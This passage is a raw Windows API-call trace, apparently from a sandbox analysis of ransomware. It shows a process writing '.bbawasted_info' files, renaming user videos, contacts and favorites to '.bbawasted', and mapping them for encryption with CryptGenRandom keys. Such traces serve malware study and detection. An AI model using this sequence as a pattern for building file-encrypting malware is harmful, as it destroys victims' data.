returned 1 [0077.074] CryptAcquireContextW (in: phProv=0x119fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fecc*=0x5a4020) returned 1 [0077.075] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x48, pbBuffer=0x119ff08 | out: pbBuffer=0x119ff08) returned 1 [0077.075] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0077.075] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\uJa-t0 nFe3Xb8_rsN8Q\\SwmdGsg.flv") returned 73 [0077.075] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x29c) returned 0x5bf070 [0077.075] lstrcpyW (in: lpString1=0x5bf102, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0077.075] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xa3a) returned 0x5c6ff0 [0077.075] CryptAcquireContextW (in: phProv=0x119fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fea8*=0x5a4020) returned 1 [0077.076] CryptGenRandom (in: hProv=0x5a4020, dwLen=0xa3a, pbBuffer=0x5c6ff0 | out: pbBuffer=0x5c6ff0) returned 1 [0077.076] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0077.076] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\uJa-t0 nFe3Xb8_rsN8Q\\SwmdGsg.flv.bbawasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\uja-t0 nfe3xb8_rsn8q\\swmdgsg.flv.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0077.077] WriteFile (in: hFile=0x120, lpBuffer=0x5c6ff0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x119fec4, lpOverlapped=0x0 | out: lpBuffer=0x5c6ff0*, lpNumberOfBytesWritten=0x119fec4*=0xa3a, lpOverlapped=0x0) returned 1 [0077.078] SetEndOfFile (hFile=0x120) returned 1 [0077.078] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0077.078] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c6ff0 | out: hHeap=0x580000) returned 1 [0077.078] lstrcpyW (in: lpString1=0x5bf102, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0077.078] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\uJa-t0 nFe3Xb8_rsN8Q\\SwmdGsg.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\uja-t0 nfe3xb8_rsn8q\\swmdgsg.flv"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\uJa-t0 nFe3Xb8_rsN8Q\\SwmdGsg.flv.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\uja-t0 nfe3xb8_rsn8q\\swmdgsg.flv.bbawasted")) returned 1 [0077.082] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\uJa-t0 nFe3Xb8_rsN8Q\\SwmdGsg.flv.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\uja-t0 nfe3xb8_rsn8q\\swmdgsg.flv.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xf8 [0077.082] CreateFileMappingW (hFile=0xf8, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xfc [0077.083] CryptAcquireContextW (in: phProv=0x119fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fe84*=0x5a4020) returned 1 [0077.084] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x1b8, pbBuffer=0x5ddda8 | out: pbBuffer=0x5ddda8) returned 1 [0077.084] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0077.084] CryptAcquireContextW (in: phProv=0x119fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fbec*=0x5a4020) returned 1 [0077.085] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x200, pbBuffer=0x119fc08 | out: pbBuffer=0x119fc08) returned 1 [0077.085] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0077.093] SetEndOfFile (hFile=0x120) returned 1 [0077.095] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c6ff0 | out: hHeap=0x580000) returned 1 [0077.095] CloseHandle (hObject=0x120) returned 1 [0077.096] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5bf070 | out: hHeap=0x580000) returned 1 [0077.097] CryptAcquireContextW (in: phProv=0x119fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fecc*=0x5a4020) returned 1 [0077.097] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x48, pbBuffer=0x119ff08 | out: pbBuffer=0x119ff08) returned 1 [0077.097] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0077.097] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\uJa-t0 nFe3Xb8_rsN8Q\\VGFzrdgU UP.mkv") returned 77 [0077.097] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x2a4) returned 0x5bf070 [0077.098] lstrcpyW (in: lpString1=0x5bf10a, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0077.100] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xa3a) returned 0x5c6ff0 [0077.100] CryptAcquireContextW (in: phProv=0x119fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fea8*=0x5a4020) returned 1 [0077.101] CryptGenRandom (in: hProv=0x5a4020, dwLen=0xa3a, pbBuffer=0x5c6ff0 | out: pbBuffer=0x5c6ff0) returned 1 [0077.101] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0077.101] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\uJa-t0 nFe3Xb8_rsN8Q\\VGFzrdgU UP.mkv.bbawasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\uja-t0 nfe3xb8_rsn8q\\vgfzrdgu up.mkv.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0077.102] WriteFile (in: hFile=0x120, lpBuffer=0x5c6ff0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x119fec4, lpOverlapped=0x0 | out: lpBuffer=0x5c6ff0*, lpNumberOfBytesWritten=0x119fec4*=0xa3a, lpOverlapped=0x0) returned 1 [0077.103] SetEndOfFile (hFile=0x120) returned 1 [0077.103] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0077.103] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c6ff0 | out: hHeap=0x580000) returned 1 [0077.103] lstrcpyW (in: lpString1=0x5bf10a, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0077.103] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\uJa-t0 nFe3Xb8_rsN8Q\\VGFzrdgU UP.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\uja-t0 nfe3xb8_rsn8q\\vgfzrdgu up.mkv"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\uJa-t0 nFe3Xb8_rsN8Q\\VGFzrdgU UP.mkv.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\uja-t0 nfe3xb8_rsn8q\\vgfzrdgu up.mkv.bbawasted")) returned 1 [0077.104] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\uJa-t0 nFe3Xb8_rsN8Q\\VGFzrdgU UP.mkv.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\uja-t0 nfe3xb8_rsn8q\\vgfzrdgu up.mkv.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xfc [0077.104] CreateFileMappingW (hFile=0xfc, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xf8 [0077.106] CryptAcquireContextW (in: phProv=0x119fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fe84*=0x5a4020) returned 1 [0077.221] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x1b8, pbBuffer=0x5ddda8 | out: pbBuffer=0x5ddda8) returned 1 [0077.221] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0077.221] CryptAcquireContextW (in: phProv=0x119fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fbec*=0x5a4020) returned 1 [0077.221] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x200, pbBuffer=0x119fc08 | out: pbBuffer=0x119fc08) returned 1 [0077.221] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0077.230] SetEndOfFile (hFile=0x120) returned 1 [0077.232] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c6ff0 | out: hHeap=0x580000) returned 1 [0077.232] CloseHandle (hObject=0x120) returned 1 [0077.234] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5bf070 | out: hHeap=0x580000) returned 1 [0077.234] CryptAcquireContextW (in: phProv=0x119fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fecc*=0x5a4020) returned 1 [0077.235] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x48, pbBuffer=0x119ff08 | out: pbBuffer=0x119ff08) returned 1 [0077.235] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0077.235] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\uJa-t0 nFe3Xb8_rsN8Q\\YfaJUrvWZ.avi") returned 75 [0077.235] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x2a0) returned 0x5bf070 [0077.235] lstrcpyW (in: lpString1=0x5bf106, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0077.235] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xa3a) returned 0x5c6ff0 [0077.235] CryptAcquireContextW (in: phProv=0x119fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fea8*=0x5a4020) returned 1 [0077.236] CryptGenRandom (in: hProv=0x5a4020, dwLen=0xa3a, pbBuffer=0x5c6ff0 | out: pbBuffer=0x5c6ff0) returned 1 [0077.236] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0077.236] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\uJa-t0 nFe3Xb8_rsN8Q\\YfaJUrvWZ.avi.bbawasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\uja-t0 nfe3xb8_rsn8q\\yfajurvwz.avi.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0077.236] WriteFile (in: hFile=0x120, lpBuffer=0x5c6ff0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x119fec4, lpOverlapped=0x0 | out: lpBuffer=0x5c6ff0*, lpNumberOfBytesWritten=0x119fec4*=0xa3a, lpOverlapped=0x0) returned 1 [0077.237] SetEndOfFile (hFile=0x120) returned 1 [0077.238] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0077.238] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c6ff0 | out: hHeap=0x580000) returned 1 [0077.238] lstrcpyW (in: lpString1=0x5bf106, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0077.238] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\uJa-t0 nFe3Xb8_rsN8Q\\YfaJUrvWZ.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\uja-t0 nfe3xb8_rsn8q\\yfajurvwz.avi"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\uJa-t0 nFe3Xb8_rsN8Q\\YfaJUrvWZ.avi.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\uja-t0 nfe3xb8_rsn8q\\yfajurvwz.avi.bbawasted")) returned 1 [0077.239] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\uJa-t0 nFe3Xb8_rsN8Q\\YfaJUrvWZ.avi.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\uja-t0 nfe3xb8_rsn8q\\yfajurvwz.avi.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xf8 [0077.239] CreateFileMappingW (hFile=0xf8, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xfc [0077.242] CryptAcquireContextW (in: phProv=0x119fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fe84*=0x5a4020) returned 1 [0077.242] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x1b8, pbBuffer=0x5ddda8 | out: pbBuffer=0x5ddda8) returned 1 [0077.242] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0077.242] CryptAcquireContextW (in: phProv=0x119fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fbec*=0x5a4020) returned 1 [0077.243] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x200, pbBuffer=0x119fc08 | out: pbBuffer=0x119fc08) returned 1 [0077.243] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0077.251] SetEndOfFile (hFile=0x120) returned 1 [0077.302] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c6ff0 | out: hHeap=0x580000) returned 1 [0077.302] CloseHandle (hObject=0x120) returned 1 [0077.304] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5bf070 | out: hHeap=0x580000) returned 1 [0077.304] CryptAcquireContextW (in: phProv=0x119fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fecc*=0x5a4020) returned 1 [0077.304] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x48, pbBuffer=0x119ff08 | out: pbBuffer=0x119ff08) returned 1 [0077.304] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0077.305] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\vyR- y.mp4") returned 51 [0077.305] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x270) returned 0x5d0700 [0077.305] lstrcpyW (in: lpString1=0x5d0766, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0077.305] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xa3a) returned 0x5c6ff0 [0077.305] CryptAcquireContextW (in: phProv=0x119fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fea8*=0x5a4020) returned 1 [0077.305] CryptGenRandom (in: hProv=0x5a4020, dwLen=0xa3a, pbBuffer=0x5c6ff0 | out: pbBuffer=0x5c6ff0) returned 1 [0077.305] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0077.305] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\vyR- y.mp4.bbawasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\vyr- y.mp4.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0077.347] WriteFile (in: hFile=0x120, lpBuffer=0x5c6ff0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x119fec4, lpOverlapped=0x0 | out: lpBuffer=0x5c6ff0*, lpNumberOfBytesWritten=0x119fec4*=0xa3a, lpOverlapped=0x0) returned 1 [0077.348] SetEndOfFile (hFile=0x120) returned 1 [0077.348] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0077.348] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c6ff0 | out: hHeap=0x580000) returned 1 [0077.348] lstrcpyW (in: lpString1=0x5d0766, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0077.348] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\vyR- y.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\vyr- y.mp4"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\vyR- y.mp4.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\vyr- y.mp4.bbawasted")) returned 1 [0077.349] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\vyR- y.mp4.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\vyr- y.mp4.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xf8 [0077.349] CreateFileMappingW (hFile=0xf8, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xfc [0077.352] CryptAcquireContextW (in: phProv=0x119fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fe84*=0x5a4020) returned 1 [0077.353] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x1b8, pbBuffer=0x5ddb00 | out: pbBuffer=0x5ddb00) returned 1 [0077.353] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0077.353] CryptAcquireContextW (in: phProv=0x119fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fbec*=0x5a4020) returned 1 [0077.353] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x200, pbBuffer=0x119fc08 | out: pbBuffer=0x119fc08) returned 1 [0077.353] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0077.362] SetEndOfFile (hFile=0x120) returned 1 [0077.364] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c6ff0 | out: hHeap=0x580000) returned 1 [0077.364] CloseHandle (hObject=0x120) returned 1 [0077.366] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5d0700 | out: hHeap=0x580000) returned 1 [0077.366] CryptAcquireContextW (in: phProv=0x119fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fecc*=0x5a4020) returned 1 [0077.367] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x48, pbBuffer=0x119ff08 | out: pbBuffer=0x119ff08) returned 1 [0077.367] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0077.367] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\Contacts\\Administrator.contact") returned 51 [0077.367] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x270) returned 0x5d0700 [0077.367] lstrcpyW (in: lpString1=0x5d0766, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0077.367] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xa3a) returned 0x5c6ff0 [0077.367] CryptAcquireContextW (in: phProv=0x119fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fea8*=0x5a4020) returned 1 [0077.368] CryptGenRandom (in: hProv=0x5a4020, dwLen=0xa3a, pbBuffer=0x5c6ff0 | out: pbBuffer=0x5c6ff0) returned 1 [0077.368] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0077.368] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Contacts\\Administrator.contact.bbawasted_info" (normalized: "c:\\users\\default\\contacts\\administrator.contact.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0077.368] WriteFile (in: hFile=0x120, lpBuffer=0x5c6ff0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x119fec4, lpOverlapped=0x0 | out: lpBuffer=0x5c6ff0*, lpNumberOfBytesWritten=0x119fec4*=0xa3a, lpOverlapped=0x0) returned 1 [0077.369] SetEndOfFile (hFile=0x120) returned 1 [0077.369] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0077.369] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c6ff0 | out: hHeap=0x580000) returned 1 [0077.369] lstrcpyW (in: lpString1=0x5d0766, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0077.370] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\Contacts\\Administrator.contact" (normalized: "c:\\users\\default\\contacts\\administrator.contact"), lpNewFileName="\\\\?\\C:\\Users\\Default\\Contacts\\Administrator.contact.bbawasted" (normalized: "c:\\users\\default\\contacts\\administrator.contact.bbawasted")) returned 1 [0077.370] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Contacts\\Administrator.contact.bbawasted" (normalized: "c:\\users\\default\\contacts\\administrator.contact.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xfc [0077.370] CreateFileMappingW (hFile=0xfc, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xf8 [0077.489] CryptAcquireContextW (in: phProv=0x119fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fe84*=0x5a4020) returned 1 [0077.490] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x1b8, pbBuffer=0x5dd658 | out: pbBuffer=0x5dd658) returned 1 [0077.490] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0077.490] CryptAcquireContextW (in: phProv=0x119fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fbec*=0x5a4020) returned 1 [0077.491] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x200, pbBuffer=0x119fc08 | out: pbBuffer=0x119fc08) returned 1 [0077.491] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0077.499] SetEndOfFile (hFile=0x120) returned 1 [0077.501] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c6ff0 | out: hHeap=0x580000) returned 1 [0077.501] CloseHandle (hObject=0x120) returned 1 [0077.503] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5d0700 | out: hHeap=0x580000) returned 1 [0077.507] CryptAcquireContextW (in: phProv=0x119fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fecc*=0x5a4020) returned 1 [0077.508] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x48, pbBuffer=0x119ff08 | out: pbBuffer=0x119ff08) returned 1 [0077.508] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0077.508] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSN Autos.url") returned 57 [0077.508] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x27c) returned 0x5afbd8 [0077.509] lstrcpyW (in: lpString1=0x5afc4a, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0077.509] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xa3a) returned 0x5c6ff0 [0077.509] CryptAcquireContextW (in: phProv=0x119fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fea8*=0x5a4020) returned 1 [0077.509] CryptGenRandom (in: hProv=0x5a4020, dwLen=0xa3a, pbBuffer=0x5c6ff0 | out: pbBuffer=0x5c6ff0) returned 1 [0077.509] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0077.509] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSN Autos.url.bbawasted_info" (normalized: "c:\\users\\default\\favorites\\msn websites\\msn autos.url.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0077.510] WriteFile (in: hFile=0x120, lpBuffer=0x5c6ff0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x119fec4, lpOverlapped=0x0 | out: lpBuffer=0x5c6ff0*, lpNumberOfBytesWritten=0x119fec4*=0xa3a, lpOverlapped=0x0) returned 1 [0077.511] SetEndOfFile (hFile=0x120) returned 1 [0077.512] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0077.512] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c6ff0 | out: hHeap=0x580000) returned 1 [0077.512] lstrcpyW (in: lpString1=0x5afc4a, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0077.512] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSN Autos.url" (normalized: "c:\\users\\default\\favorites\\msn websites\\msn autos.url"), lpNewFileName="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSN Autos.url.bbawasted" (normalized: "c:\\users\\default\\favorites\\msn websites\\msn autos.url.bbawasted")) returned 1 [0077.512] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSN Autos.url.bbawasted" (normalized: "c:\\users\\default\\favorites\\msn websites\\msn autos.url.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xf8 [0077.513] CreateFileMappingW (hFile=0xf8, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x110 [0077.513] CryptAcquireContextW (in: phProv=0x119fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fe84*=0x5d0908) returned 1 [0077.514] CryptGenRandom (in: hProv=0x5d0908, dwLen=0x1b8, pbBuffer=0x5d0748 | out: pbBuffer=0x5d0748) returned 1 [0077.514] CryptReleaseContext 